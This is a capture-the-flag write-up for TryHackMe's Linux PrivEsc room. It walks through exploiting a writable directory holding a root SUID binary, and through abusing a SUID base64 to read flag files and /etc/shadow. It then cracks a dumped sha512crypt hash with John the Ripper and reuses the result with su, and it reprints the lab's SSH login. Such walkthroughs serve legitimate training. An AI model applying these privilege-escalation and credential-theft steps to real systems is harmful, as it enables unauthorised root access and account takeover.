TryHackMe: Write-Up Linux PrivEsc

3 min readMar 23, 2022

Here’s a write-up for Task 10 and 12 in Room

The other tasks in the same room have intensive instructions which are relatively easy to follow. Task 10 was slightly more confusing. Task 12 is a challenge question with no instructions. Therefore I’ll only write for these tasks.

Task 10: Privilege Escalation: PATH

Q. What is the odd folder you have write access for?

Find the writable files/dirs and pipe the result to a file (which is easier to inspect later)

> find / -writable 2>/dev/null > /tmp/result

Skimming through the result, one directory stood out (/home/murdoch, the home directory of a rich guy).

Note that this directory will be useful for later questions too.

In the instructions for this task, it requires making a C file (path_exp.c). However, gcc is not installed on the machine, which makes the compilation difficult. Moreover, at this stage, the root privilege is not yet obtained. Even if you have the executable compiled, you won’t be able to chown to root and add a SUID bit for this exploit.

Here’s when Murdoch’s home is helpful. In /home/murdoch, there’s a binary file named ‘test’ owned by root with SUID set (which is the executable of path_exp.c).

$ ls -al /home/murdochtotal 32drwxrwxrwx 2 root root  4096 Oct 22 07:19 .drwxr-xr-x 5 root root  4096 Jun 20  2021 ..-rwsr-xr-x 1 root root 16712 Jun 20  2021 test-rw-rw-r-- 1 root root    86 Jun 20  2021

Run ./test

$ ./testroot@ip-10-10-xx-xx:/home/murdoch#

and now you are root.

Q. What is the content of the flag6.txt file?

root@ip-10-10-xx-xx:/root# find / -name "flag6.txt" 2>/dev/null/home/matt/flag6.txt

Task 12 Capstone Challenge

By now you have a fairly good understanding of the main privilege escalation vectors on Linux and this challenge should be fairly easy.You have gained SSH access to a large scientific facility. Try to elevate your privileges until you are Root.
We designed this room to help you build a thorough methodology for Linux privilege escalation that will be very useful in exams such as OSCP and your penetration testing engagements.
Leave no privilege escalation vector unexplored, privilege escalation is often more an art than a science.You can access the target machine over your browser or use the SSH credentials below.Username: leonard
Password: Penny123

Of course, Leonard would have used Penny’s name for password.

As usual, find the SUID executables

> find / -type f -perm -04000 -ls 2>/dev/null

Compare with and both base64 and at could be exploitable.

What is the content of the flag2.txt file?

Check leonard’s bash history and you should see something like

15  cd rootflag/16  ls17  cat flag2.txt

Looks like I found flag2.txt before flag1.txt. Run the following (without >):

> LF='/home/rootflag/flag2.txt'
> base64 $LF | base64 --decode

What is the content of the flag1.txt file?

Using the same trick, we can check the shadow file.

> LF='/etc/shadow'
> base64 $LF | base64 --decode

You will see root’s and missy’s shadow hash. Since I already have the rootflag, I just need to crack missy’s.


Save the hash between ‘missy:’ until the next immediate ‘:’

> echo $6$BjOlWE21$HwuDvV1iSiySCNpA3Z9LxkxQEqUAdZvObTxJxMoCp/9zRVCi6/zrlMlAQPAxfwaD2JCUypk4HaNzI3rPVqKHb/ > missy-hash-file

Then use John the Ripper to enumerate the popular passwords:

> john --wordlist=/usr/share/wordlists/rockyou.txt -format=sha512crypt missy-hash-file

After obtaining missy’s password, you can become missy by

> su - missy

Then find flag1.txt by

> find / -name "flag1.txt" 2>/dev/null